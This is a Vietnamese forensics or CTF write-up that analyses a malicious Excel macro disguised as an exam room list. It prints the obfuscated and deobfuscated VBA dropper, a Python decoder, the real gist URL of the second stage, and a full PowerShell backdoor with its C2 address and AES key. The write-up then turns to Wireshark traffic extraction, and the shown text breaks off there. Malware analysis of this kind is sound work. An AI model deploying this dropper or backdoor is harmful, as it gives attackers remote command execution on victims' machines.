°»»¦¡½º®¤¼º¬³¤³º¸¶®¨½®©µ«¢´¾´··¦«º¬º°¥²ª¹«¿º¼£º·¦¢¬°¢¾§µ²° As String Dim £©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦ As Long Dim ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬ Dim ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥ Dim ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ As Integer Dim ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸² Dim ®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°© ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ = 1 Range("A1").Value = ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("4BEiàiuP3x6¿QEi³") Dim ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤ As String ´¸®¢»¬«¢®¼¿¾«²¡»¦°´»·°º¥ª¡½½¤§»´ª§¥¸»®«¶¿¸¶¢³µ¶¾¿¼£²¡¾«¹¶¹§ºµº¦¶¹¦¨¸®¸§¹µ³¢£¯©¦¾·º£¼º²»¨®²¦¤¦·½»¶³ = "$x¿PÜ_jEPkEEiPÜ_6IE3P_i3PÛx¿²PàQBx²³_i³P3x6¿QEi³bPÜ_jEPkEEiPb³x#Eir" & vbCrLf & "ÒxP²E³²àEjEP³ÜEbEP3_³_(PÛx¿P_²EP²E7¿à²E3P³xP³²_ib0E²P@mmIP³xP³ÜEP0x##xÄàiuPk_iIP_66x¿i³Pi¿QkE²:P" & vbCrLf & "@m@m@mo@@§mmm" & vbCrLf & "g66x¿i³PÜx#3E²:PLu¿ÛEiPÒÜ_iÜP!xiu" & vbCrLf & "t_iI:PTtPt_iI" ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤ = ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨(´¸®¢»¬«¢®¼¿¾«²¡»¦°´»·°º¥ª¡½½¤§»´ª§¥¸»®«¶¿¸¶¢³µ¶¾¿¼£²¡¾«¹¶¹§ºµº¦¶¹¦¨¸®¸§¹µ³¢£¯©¦¾·º£¼º²»¨®²¦¤¦·½»¶³) MsgBox ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤, vbInformation, ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("pEP3EEB#ÛP²Eu²E³P³xPài0x²QPÛx¿") Dim ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª As Date Dim ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ As Date ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª = Date ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ = DateSerial(2023, 6, 6) If ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª < ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ Then Set ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸² = CreateObject("microsoft.xmlhttp") Set ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥ = CreateObject("Shell.Application") ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬ = ¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ + ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("\k¿i6Ü_~Bb@") ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².Open "get", ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("Ü³³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@"), False ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².send ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ = ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².responseBody If ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².Status = 200 Then Set ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼ = CreateObject("adodb.stream") ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Open ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Type = ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Write ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.SaveToFile ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬, ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ + ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Close End If ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥.Open (³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬) Else MsgBox ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("åxi'³P³²ÛP³xP²¿iPQEPk²x") End If End Sub ------------------------------------------------------------------------------- VBA MACRO Sheet2.cls in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet2' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) ------------------------------------------------------------------------------- VBA MACRO Sheet3.cls in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet3' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) ------------------------------------------------------------------------------- VBA MACRO xlm_macro.txt in file: xlm_macro - OLE stream: 'xlm_macro' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet +----------+--------------------+---------------------------------------------+ |Type |Keyword |Description | +----------+--------------------+---------------------------------------------+ |AutoExec |AutoOpen |Runs when the Word document is opened | |AutoExec |DocumentOpen |Runs when the Word document is opened | |AutoExec |Document_Open |Runs when the Word or Publisher document is | | | |opened | |AutoExec |Auto_Open |Runs when the Excel Workbook is opened | |AutoExec |Workbook_Open |Runs when the Excel Workbook is opened | |Suspicious|Open |May open a file | |Suspicious|Write |May write to a file (if combined with Open) | |Suspicious|adodb.stream |May create a text file | |Suspicious|SaveToFile |May create a text file | |Suspicious|Shell |May run an executable file or a system | | | |command | |Suspicious|WScript.Shell |May run an executable file or a system | | | |command | |Suspicious|CreateObject |May create an OLE object | |Suspicious|Shell.Application |May run an application (if combined with | | | |CreateObject) | |Suspicious|microsoft.xmlhttp |May download files from the Internet | |Suspicious|Chr |May attempt to obfuscate specific strings | | | |(use option --deobf to deobfuscate) | |Suspicious|Hex Strings |Hex-encoded strings were detected, may be | | | |used to obfuscate strings (option --decode to| | | |see all) | +----------+--------------------+---------------------------------------------+ ``` Đến đây nhận thấy code này đã bị obfuscate, đem vào vscode và chỉnh một xíu ở phần tên hàm tên biến để cho dễ đọc. ```bash Function a(b) c = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥" d = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ" For y = 1 To Len(b) e = InStr(c, Mid(b, y, 1)) If e > 0 Then f = Mid(d, e, 1) g = g + f Else g = g + Mid(b, y, 1) End If Next a = g For h = 1 To Len(i) i = h Next For j = 2 To Len(k) k = 2 Next For l = 3 To Len(m) m = l Next For n = 4 To Len(o) o = 2 Next End Function Sub Workbook_Open() Dim p As Object Dim q As String Dim r As String Dim s As String Dim t As Integer t = Chr(50) + Chr(48) + Chr(48) Set p = CreateObject("WScript.Shell") q = p.SpecialFolders("AppData") Dim u Dim v Dim y Dim h As Long Dim j As String Dim x As Long Dim m As String Dim l As Long Dim n As String Dim y As String Dim k As Long Dim z Dim w Dim val1 As Integer Dim val2 Dim val3 val1 = 1 Range("A1").Value = a("4BEiàiuP3x6¿QEi³") Dim val4 As String val5 = "$x¿PÜ_jEPkEEiPÜ_6IE3P_i3PÛx¿²PàQBx²³_i³P3x6¿QEi³bPÜ_jEPkEEiPb³x#Eir" & vbCrLf & "ÒxP²E³²àEjEP³ÜEbEP3_³_(PÛx¿P_²EP²E7¿à²E3P³xP³²_ib0E²P@mmIP³xP³ÜEP0x##xÄàiuPk_iIP_66x¿i³Pi¿QkE²:P" & vbCrLf & "@m@m@mo@@§mmm" & vbCrLf & "g66x¿i³PÜx#3E²:PLu¿ÛEiPÒÜ_iÜP!xiu" & vbCrLf & "t_iI:PTtPt_iI" val4 = a(val5) MsgBox val4, vbInformation, a("pEP3EEB#ÛP²Eu²E³P³xPài0x²QPÛx¿") Dim val6 As Date Dim val7 As Date val6 = Date val7 = DateSerial(2023, 6, 6) If val6 < val7 Then Set val2 = CreateObject("microsoft.xmlhttp") Set w = CreateObject("Shell.Application") z = q + a("\k¿i6Ü_~Bb@") val2.Open "get", a("Ü³³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@"), False val2.send v = val2.responseBody If val2.Status = 200 Then Set u = CreateObject("adodb.stream") u.Open u.Type = val1 u.Write v u.SaveToFile z, val1 + val1 u.Close End If w.Open (z) Else MsgBox a("åxi'³P³²ÛP³xP²¿iPQEPk²x") ``` Chú ý từ 2 đoạn là: Đầu tiên là từ Function a(b) -> End Function ```bassh Function a(b) c = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥" d = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ" For y = 1 To Len(b) e = InStr(c, Mid(b, y, 1)) If e > 0 Then f = Mid(d, e, 1) g = g + f Else g = g + Mid(b, y, 1) End If Next a = g For h = 1 To Len(i) i = h Next For j = 2 To Len(k) k = 2 Next For l = 3 To Len(m) m = l Next For n = 4 To Len(o) o = 2 Next End Function ``` Thứ 2 là đoạn này ```bash z = q + a("\k¿i6Ü_~Bb@") val2.Open "get", a("Ü³³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@"), False val2.send ``` Function `a(b)` phía trên sẽ dùng để decode cái URL này, giờ mình sẽ convert nó qua python rồi chạy lấy URL ```python def a(b): c = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥" d = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ" g = "" for y in range(len(b)): e = c.find(b[y]) if e > -1: f = d[e] g += f else: g += b[y] a = g return a print( a("Ü³³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@")) ``` Kết quả là đường dẫn: https://gist.githubusercontent.com/bquanman/98da73d49faec0cbbdab02d4fd84adaa/raw/8de8b90981e667652b1a16f5caed364fdc311b77/a80sc012.ps1 Đường dẫn cho mình 1 đoạn PowerShell code, giờ tải về nó về và dùng powerdecode để deobfuscate, và đây là kết quả: ```bash ${8rT3WA} = [tyPe]'sySTEm.seCUrItY.cryPTOGRaphY.CiphERMOde' ;SV '72j5O' ( [TYpe]'sYstem.seCuriTY.cRYptoGRapHY.paDDingmOde' ) ; ${XNfD}=[tyPe]'System.cONVErT' ; ${HLvW1} = [tYPe]'SYStEM.tEXt.EnCOdiNG'; SeT-iTem 'vARIabLE:92y7' ( [Type]'SysteM.NEt.dnS') ; ${UJXRc}=[tyPE]'StrinG' ;function CrEATe-AeSmanAGeDoBJeCt(${vxZTmff}, ${5TMRWpLUy}) { ${AJuJVRAZ99} = New-Object 'System.Security.Cryptography.AesManaged' ${AJUjvrAZ99}.Mode = ( gEt-vARIAblE ("8rt3Wa") -Value )::"cBc" ${aJujVRAZ99}.PAddInG = ( Dir 'vARIable:72j5o' ).VALUe::"zeRos" ${AJUJvrAz99}.BlOckSizE = 128 ${AjuJvRAz99}.keysIze = 256 if (${5TMRWPluy}) { if (${5TmRWpLuy}.getType.iNVOke().nAME -eq 'String') { ${ajUjvRaZ99}.Iv = (dir 'vaRIaBle:xNFd').vAlUe::'FromBase64String'.InVOKe(${5TMRWPlUy}) } else { ${ajUjVraZ99}.IV = ${5tmRwPLUy} } } if (${VxZtMFF}) { if (${VXzTmfF}.getType.INvoKe().nAME -eq 'String') { ${ajUjVraZ99}.Key = ( LS 'VariAble:XNFD' ).vAluE::'FromBase64String'.invOKe(${vxzTmFF}) } else { ${AjUJVrAZ99}.key = ${vXzTmff} } } ${aJUjvRAZ99} } function eNCRYpT(${VxzTMFf}, ${ROFPdqRF99}) { ${ByTES} = ( varIable 'hlvW1' ).vALUE::"uTf8".GetBytes.INVokE(${rOFpdQRF99}) ${ajujVRAZ99} = Create-AesManagedObject ${VXZtMFf} ${qDIqLGaQ99} = ${aJujVRAZ99}.CreateEncryptor.inVoKe() ${lwihYmIF99} = ${QdiqLgaq99}.TransformFinalBlock.iNvOKe(${byTeS}, 0, ${byTes}.LeNgTh); [byte[]] ${fJAxUWQN99} = ${AJujvRAz99}.Iv + ${lWiHYmiF99} ${ajUJVRAZ99}.Dispose.iNVOKE() ${xNFd}::"tOBase64STRiNG".iNvoke(${FjAXUWqN99}) } function deCRyPT(${VXztmFF}, ${bKJrxQCf99}) { ${bYTEs} = (vARiable 'xnfd' ).ValuE::'FromBase64String'.InVOKE(${BkjRxqcF99}) ${5tMRWpLuY} = ${BYTes}[0..15] ${aJuJVraz99} = Create-AesManagedObject ${VxZTmFF} ${5TMRwpLUY} ${MNDmWYnB99} = ${AJUjvRAz99}.CreateDecryptor.InVoke(); ${AhtLMYhl99} = ${MNDmWynB99}.TransformFinalBlock.iNvokE(${bYTES}, 16, ${byTeS}.lENgTH - 16); ${AJUjVRAZ99}.Dispose.INVOKE() ${HLVW1}::"uTF8".GETStriNg(${AhtLmYhl99}).TRIM([char]0) } function ShELL(${DfJz1co}, ${yo8xm5}){ ${CwzVYVJ} = New-Object 'System.Diagnostics.ProcessStartInfo' ${CwZVyVj}.FIlename = ${DFjZ1co} ${CWzvYvj}.reDIRecTsTAnDaRdERrOR = ${TRue} ${cwZVYVJ}.ReDIREcTsTANdarDoUTPUT = ${tRUe} ${CWZvyVJ}.USEshELleXeCUTe = ${FALsE} ${cwzvyVJ}.aRgUmENtS = ${yO8xm5} ${p} = New-Object 'System.Diagnostics.Process' ${P}.sTArTiNFO = ${CWzvYVj} ${p}.Start.INvoKE() | Out-Null ${P}.WaitForExit.invoKE() ${BHnxNUrW99} = ${p}.staNdardOuTpUT.ReadToEnd.INVOkE() ${NmWkjOAB99} = ${p}.StANdArdeRrOR.ReadToEnd.Invoke() ${kCNjcQdL} = ('VALID '+"$BhnXnUrW99n$nmWKJOAb99") ${KcnJcQDl} } ${FZvyCr} = '128.199.207.220' ${twFTrI} = '7331' ${VxzTmff} = 'd/3KwjM7m2cGAtLI67KlhDuXI/XRKSTkOlmJXE42R+M=' ${n} = 3 ${Cwj2TWh} = "" ${yCRUTw} = ${92Y7}::'GetHostName'.inVoKE() ${FNFFGXDzj} = "p" ${DFctDFM} = ('http:' + "//$FZVYCR" + ':' + "$TwFTRi/reg") ${kVQBXbuR} = @{ 'name' = "$YCRUTw" 'type' = "$fNFFGXDZJ" } ${CWj2TWh} = (Invoke-WebRequest -UseBasicParsing -Uri ${dFctDFM} -Body ${kVqBxbUr} -Method 'POST').coNTENT ${TvYMeYrR99} = ('http:' + "//$FZVYCR" + ':' + "$TwFTRi/results/$cWJ2Twh") ${iJfySE2} = ('http:' + "//$FZVYCR" + ':' + "$TwFTRi/tasks/$cWJ2Twh") for (;;){ ${MA04XMgY} = (Invoke-WebRequest -UseBasicParsing -Uri ${IJFYSE2} -Method 'GET').cONTeNt if (-Not ${UJXRc}::'IsNullOrEmpty'.INvOKe(${MA04XmGy})){ ${mA04XMgY} = Decrypt ${VXZTmff} ${Ma04XMgY} ${mA04XMgY} = ${ma04XMgy}.split.INvokE() ${FLAG} = ${MA04xmgY}[0] if (${FlAg} -eq 'VALID'){ ${WB1SWYoje} = ${MA04XMgY}[1] ${yO8XM5S} = ${Ma04XMgY}[2..${MA04xmgY}.LeNgTH] if (${wb1sWyoJe} -eq 'shell'){ ${F} = 'cmd.exe' ${yO8XM5} = "/c " foreach (${a} in ${yo8xM5s}){ ${Yo8xm5} += ${a} + " " } ${KcNJCQdL} = shell ${f} ${yo8xM5} ${kCnjCQDL} = Encrypt ${VxztMFF} ${kcNjcqdl} ${kvqbXBUr} = @{'result' = "$KcnJCQDl"} Invoke-WebRequest -UseBasicParsing -Uri ${tVyMEyRR99} -Body ${kVQbXbur} -Method 'POST' } elseif (${Wb1SwYOJe} -eq 'powershell'){ ${f} = 'powershell.exe' ${yO8Xm5} = "/c " foreach (${a} in ${Yo8xM5s}){ ${YO8xm5} += ${a} + " " } ${kcNjcqdL} = shell ${F} ${yO8XM5} ${kcnjCQDL} = Encrypt ${vXZTmfF} ${KCNjcqDl} ${KVqbxBUr} = @{'result' = "$KcnJCQDl"} Invoke-WebRequest -UseBasicParsing -Uri ${tvyMEYRR99} -Body ${kVqBXbUr} -Method 'POST' } elseif (${wb1swYOJe} -eq 'sleep'){ ${n} = [int]${yO8Xm5S}[0] ${kVQBXbur} = @{'result' = ""} Invoke-WebRequest -UseBasicParsing -Uri ${tVYmeyrR99} -Body ${KvQBXBur} -Method 'POST' } elseif (${wb1sWyojE} -eq 'rename'){ ${cwJ2tWh} = ${YO8Xm5S}[0] ${TVYmeyRr99} = ('http:' + "//$FZVYCR" + ':' + "$TwFTRi/results/$cWJ2Twh") ${ijFYsE2} = ('http:' + "//$FZVYCR" + ':' + "$TwFTRi/tasks/$cWJ2Twh") ${kVQbXbUr} = @{'result' = ""} Invoke-WebRequest -UseBasicParsing -Uri ${TVYmEyRR99} -Body ${KvqBxbUr} -Method 'POST' } elseif (${wB1sWYOJe} -eq 'quit'){ exit } } sleep ${N} } } ``` Đây là mã hóa AES 256 với key là `${vXzTmff} = 'd/3KwjM7m2cGAtLI67KlhDuXI/XRKSTkOlmJXE42R+M='` Còn IV và plaint text thì liên quan đến đoạn `Decrypt` Sau khi `Decrypt` và lưu kết quả vào mảng `${kVQBXbur}`, sẽ gửi đi POST request ![](https://hackmd.io/_uploads/r1yAertFn.png) Tìm kiếm `http.request.method == "POST"` trên wireshark ![](https://hackmd.io/_uploads/rkrqWHYF3.png) Dùng tshark để extract dữ liệu trong `urlencoded-form.value` ta được ``` aix8RxrqFg9Wi2uiE6B8BVgr5L51x55Cxxxw4zppPONqXskKoe+N7OMDg1d06pTj 